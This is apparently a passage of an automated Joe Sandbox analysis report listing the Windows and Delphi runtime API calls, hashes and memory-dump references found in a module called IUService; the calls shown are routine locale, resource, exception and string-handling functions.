                                                                                                                                              • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 5000C622
                                                                                                                                              • Part of subcall function 5000C58C: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 5000C66B
                                                                                                                                              • Part of subcall function 5000C58C: RegQueryValueExW.ADVAPI32(?,5000C8B4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001), ref: 5000C689
                                                                                                                                              • Part of subcall function 5000C58C: RegCloseKey.ADVAPI32(?,5000C6C7,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 5000C6BA
                                                                                                                                            • GetModuleHandleW.KERNEL32(?,00000000,5002A8E2), ref: 5002A7D3
                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00000000,5002A8E2), ref: 5002A7E6
                                                                                                                                            • GetLastError.KERNEL32(?,00000000,5002A8E2), ref: 5002A801
                                                                                                                                            • @Sysutils@SysErrorMessage$qqrui.RTL120(?,00000000,5002A8E2), ref: 5002A809
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,?,00000000,5002A8E2), ref: 5002A82B
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,?,00000000,5002A8E2), ref: 5002A830
                                                                                                                                            • FindResourceW.KERNEL32(00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A84E
                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A85C
                                                                                                                                            • LockResource.KERNEL32(00000000,00000000,5002A8A1,?,00000000,00000000,00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A87C
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,00000000,5002A8A1,?,00000000,00000000,00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A885
                                                                                                                                            • FreeResource.KERNEL32(00000000,5002A8A8,?,00000000,00000000,00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A89B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Resource$Open$LoadSystem@@Unicode$ErrorModuleQueryStringSysutils@Value$Asg$qqrr20Char$qqrr20CloseExcept$qqrvException@$bctr$qqrp20FileFindFreeFromHandleLastLibraryLockMessage$qqruiModule$qqrpboNameRaiseRecpx14RecxiStringpbStringx20
                                                                                                                                            • String ID: DESCRIPTION
                                                                                                                                            • API String ID: 3160456903-3773289166
                                                                                                                                            • Opcode ID: 9c728f30882331a281c9099e372204b5d02cfbfa5d2dcb8aba3413716321baf8
                                                                                                                                            • Instruction ID: 2fbb488c572c727051016de5f65cec4f5785d2b5e39462af3f2b4d4cfef47028
                                                                                                                                            • Opcode Fuzzy Hash: 9c728f30882331a281c9099e372204b5d02cfbfa5d2dcb8aba3413716321baf8
                                                                                                                                            • Instruction Fuzzy Hash: 2731A270A062D9AFEB05CFF4EC55B9DB7F9EB1A304F9045A6F500A3242DE385A40C7A0
                                                                                                                                            APIs
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,5002DB19,?,00000000), ref: 5002D9D3
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(00000000,5002DB19,?,00000000), ref: 5002D9CE
                                                                                                                                              • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                                                              • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                                                              • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002D9F7
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002D9FC
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DA1F
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DA24
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002DB19,?,00000000), ref: 5002DA41
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DA70
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DA75
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(00000000,5002DB19,?,00000000), ref: 5002DA7F
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DAAA
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DAAF
                                                                                                                                            • @Sysutils@TEncoding@GetByteCount$qqrx20System@UnicodeStringii.RTL120(5002D963,00000000,?,00000000,5002DB19,?,00000000), ref: 5002DABD
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(5002D963,00000000,?,00000000,5002DB19,?,00000000), ref: 5002DAD8
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(5002D963,00000000,?,00000000,5002DB19,?,00000000), ref: 5002DADD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$String$RaiseSysutils@$Except$qqrvException@$bctr$qqrp20$Recpx14Recxi$Unicode$AfterAnsiArrayByteClassClassoConstruction$qqrp14Count$qqrx20Create$qqrp17Encoding@Error$qqrucFromInternalLength$qqrvList$qqrvLoadMetaObjectStr$qqrr20String$qqrp20StringiiStringx27System@%T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1510222668-0
                                                                                                                                            • Opcode ID: 04cde6b8ab52445afbce40d0579e5524d879601997f477b20f500470919b9e46
                                                                                                                                            • Instruction ID: c200511c8af83f716f27c4f8f74ee48d0f5db12a54d239dde748c8e376a153b6
                                                                                                                                            • Opcode Fuzzy Hash: 04cde6b8ab52445afbce40d0579e5524d879601997f477b20f500470919b9e46
                                                                                                                                            • Instruction Fuzzy Hash: 1551A330A065869FDB10DFA8ED91AAEB7F9EF54304F508266F904D7351CB70AE01CBA1
                                                                                                                                            APIs
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002D7AB
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002D7A6
                                                                                                                                              • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                                                              • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                                                              • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002D7C9
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002D7CE
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D7F1
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D7F6
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D819
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D81E
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D826
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D84B
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D850
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D85A
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D885
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D88A
                                                                                                                                            • @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%ii.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D898
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D8B3
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D8B8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$RaiseStringSysutils@$Except$qqrvException@$bctr$qqrp20$Recpx14Recxi$ArrayLength$qqrv$AfterArray$tb%iiByteClassClassoConstruction$qqrp14Count$qqrx24Create$qqrp17DynamicEncoding@Error$qqrucList$qqrvLoadMetaObjectString$qqrp20System@%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1237184820-0
                                                                                                                                            APIs
                                                                                                                                            • @Variants@@VarFromInt$qqrr8TVarDataxixzc.RTL120(00000000,5003177B,?,?,?,00000000), ref: 5003162F
                                                                                                                                            • @Variants@@VarFromInt$qqrr8TVarDataxixzc.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031642
                                                                                                                                            • @Variants@@VarFromReal$qqrv.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031653
                                                                                                                                            • @Variants@@VarFromReal$qqrv.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031664
                                                                                                                                            • @Variants@@VarFromCurr$qqrv.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031675
                                                                                                                                            • @Variants@@VarFromReal$qqrv.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031686
                                                                                                                                            • @Variants@@VarFromWStr$qqrr8TVarDatax17System@WideString.RTL120(00000000,5003177B,?,?,?,00000000), ref: 5003169F
                                                                                                                                            • @Variants@@VarFromBool$qqrr8TVarDataxo.RTL120(00000000,5003177B,?,?,?,00000000), ref: 500316B8
                                                                                                                                            • @Variants@@VarFromInt$qqrr8TVarDataxixzc.RTL120(00000000,5003177B,?,?,?,00000000), ref: 500316CC
                                                                                                                                            • @Variants@@VarFromInt$qqrr8TVarDataxixzc.RTL120(00000000,5003177B,?,?,?,00000000), ref: 500316E0
                                                                                                                                            • @Variants@@VarFromInt$qqrr8TVarDataxixzc.RTL120(00000000,5003177B,?,?,?,00000000), ref: 500316F1
                                                                                                                                            • @Variants@@VarFromInt$qqrr8TVarDataxixzc.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031701
                                                                                                                                            • @Variants@@VarFromInt64$qqrr8TVarDataxj.RTL120(?,?,00000000,5003177B,?,?,?,00000000), ref: 50031714
                                                                                                                                            • @Variants@@VarFromUInt64$qqrr8TVarDataxuj.RTL120(?,?,?,?,00000000,5003177B,?,?,?,00000000), ref: 50031727
                                                                                                                                            • @Variants@@VarCopyNoInd$qqrr8TVarDatarx8TVarData.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031735
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(50031782,?,?,00000000), ref: 50031775
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Variants@@$From$DataxixzcInt$qqrr8$Real$qqrv$Int64$qqrr8$Bool$qqrr8Clr$qqrpvCopyCurr$qqrvDataDatarx8Datax17DataxjDataxoDataxujInd$qqrr8Str$qqrr8StringSystem@System@@Wide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1012867692-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023814), ref: 500236D8
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023814), ref: 50023706
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000200,00000000,50023814), ref: 5002371A
                                                                                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,50023814), ref: 50023726
                                                                                                                                            • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 5002372C
                                                                                                                                            • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 50023746
                                                                                                                                            • @Sysutils@CharToByteLen$qqrx20System@UnicodeStringi.RTL120(?,00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 5002376D
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 5002377B
                                                                                                                                              • Part of subcall function 5000A464: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                                                              • Part of subcall function 5000A464: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                                                            • @Sysutils@ByteToCharLen$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237A6
                                                                                                                                            • @Sysutils@CharToByteIndex$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237B7
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237D3
                                                                                                                                            • @Sysutils@CharToByteLen$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237E3
                                                                                                                                            • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237EE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$Char$From$ByteStringStringiSysutils@$Len$qqrx20Stringpbi$Asg$qqrr20Len$qqrr20Stringx20$AnsiArray$qqrr20Char$qqrr20Char$qqrx20Copy$qqrx20DateFormatIndex$qqrx20InternalLocaleStr$qqrr20StringiiStringpbStringx27System@%T$us$i0$%Thread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3483906196-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50022B5C), ref: 50022A20
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50022B5C), ref: 50022A4E
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000100,00000000,50022B5C), ref: 50022A62
                                                                                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022A6E
                                                                                                                                            • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022A74
                                                                                                                                            • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022A8E
                                                                                                                                            • @Sysutils@CharToByteLen$qqrx20System@UnicodeStringi.RTL120(?,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022AB5
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022AC3
                                                                                                                                              • Part of subcall function 5000A464: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                                                              • Part of subcall function 5000A464: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                                                            • @Sysutils@ByteToCharLen$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022AEE
                                                                                                                                            • @Sysutils@CharToByteIndex$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022AFF
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022B1B
                                                                                                                                            • @Sysutils@CharToByteLen$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022B2B
                                                                                                                                            • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022B36
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$Char$From$ByteStringStringiSysutils@$Len$qqrx20Stringpbi$Asg$qqrr20Len$qqrr20Stringx20$AnsiArray$qqrr20Char$qqrr20Char$qqrx20Copy$qqrx20DateFormatIndex$qqrx20InternalLocaleStr$qqrr20StringiiStringpbStringx27System@%T$us$i0$%Thread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3483906196-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C84D
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C749
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C774
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C8D4), ref: 5001C79A
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C7BC
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C7E7
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C813
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001C8D4), ref: 5001C866
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,5001C8D4), ref: 5001C86B
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C891
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C8D4), ref: 5001C8AD
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001C8D4), ref: 5001C8B9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50010450,?,?,?,?), ref: 500102B1
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010450,?,?,?,?), ref: 500102CE
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010450,?,?,?,?), ref: 50010306
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,500108D0,00000000,50010450,?,?,?,?), ref: 50010337
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,500108D0,00000000,50010450,?,?,?,?), ref: 5001033C
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 50010392
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 50010397
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010450,?,?,?,?), ref: 500103B4
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 500103E1
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 500103E6
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 5001041C
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 50010421
                                                                                                                                            APIs
                                                                                                                                            • @Variants@VarResultCheck$qqrl.RTL120(?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 50031275
                                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 500312E9
                                                                                                                                            • @Variants@VarResultCheck$qqrl.RTL120(?,00000001,?,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB), ref: 500312EE
                                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 50031305
                                                                                                                                            • @Variants@VarResultCheck$qqrl.RTL120(?,00000001,?,?,00000001,?,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530), ref: 5003130A
                                                                                                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 5003133E
                                                                                                                                            • @Variants@VarArrayCreateError$qqrv.RTL120(?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 50031349
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 50031354
                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 500313BB
                                                                                                                                            • @Variants@VarResultCheck$qqrl.RTL120(?,?,?,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB), ref: 500313C0
                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 500313D4
                                                                                                                                            • @Variants@VarResultCheck$qqrl.RTL120(00000000,?,?,?,?,?,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530), ref: 500313D9
                                                                                                                                            • VariantCopy.OLEAUT32(?,00000000), ref: 50031409
                                                                                                                                            • @Variants@VarResultCheck$qqrl.RTL120(?,00000000,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB), ref: 5003140E
                                                                                                                                            APIs
                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,5002647C), ref: 50026303
                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 50026327
                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 50026342
                                                                                                                                            • @Sysutils@AnsiStrRScan$qqrpbb.RTL120(?,?,00000105), ref: 50026366
                                                                                                                                            • @Sysutils@StrLCopy$qqrpbpxbui.RTL120(?,?,00000105), ref: 5002637B
                                                                                                                                            • @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(?,?,00000105), ref: 50026392
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,00000105), ref: 5002639E
                                                                                                                                            • @Sysutils@StrLen$qqrpxb.RTL120(?,?,00000105), ref: 500263A7
                                                                                                                                            • @System@FindResourceHInstance$qqrui.RTL120(0000FFD6,?,00000100,?,?,00000105), ref: 500263D7
                                                                                                                                            • LoadStringW.USER32(00000000,0000FFD6,?,00000100), ref: 500263DD
                                                                                                                                            • @System@TObject@ClassName$qqrv.RTL120(?,?,00000105), ref: 500263EA
                                                                                                                                            • @Sysutils@StrLFmt$qqrpbuit1px14System@TVarRecxi.RTL120(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,00000105), ref: 50026454
                                                                                                                                            • @Sysutils@StrLen$qqrpxb.RTL120(?,?,?,?,?,?,?,?,?,?,?,?,00000105), ref: 5002645C
                                                                                                                                            APIs
